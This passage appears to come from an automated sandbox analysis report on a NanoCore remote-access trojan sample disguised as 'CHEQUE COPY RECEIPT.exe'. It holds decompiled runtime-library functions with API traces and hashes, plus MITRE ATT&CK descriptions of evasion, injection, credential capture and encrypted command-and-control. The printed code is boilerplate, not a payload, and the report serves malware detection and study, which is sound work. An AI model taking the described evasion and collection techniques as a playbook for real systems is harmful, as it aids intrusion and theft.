						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x6635e7d3
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

CorExitProcess, xrefs: 0040365D
mscoree.dll, xrefs: 0040364B

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x6635e7d3
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x677b68
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x00409be4
0x00409bf1
0x00409bf7
0x00409bff
0x00409c0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00409c15
0x00409c15
0x00409c17
0x00409c29
0x00000000
0x00000000
0x00409c2b
0x00409c3b
0x00000000
0x00000000
0x00409c43
0x00409c45
0x00409c46
0x00409c5e
0x00409c65
0x00000000
0x00409c73
0x00000000
0x00409c6e
0x00409bff
0x00409bf3
0x00409bf3
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
__dosmaperr.LIBCMT ref: 00409C68

Strings

h{g, xrefs: 00409BF7

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: h{g
API String ID: 2583163307-2794985292
Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x6635e7d4
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}

0x0040557b
0x00405586
0x0040558d

APIs

GetCommandLineA.KERNEL32 ref: 00405575
GetCommandLineW.KERNEL32 ref: 00405580

Strings

`3f, xrefs: 0040557B

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CommandLine
String ID: `3f
API String ID: 3253501508-3878466415
Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CHEQUE COPY RECEIPT.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Function 73CA1A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

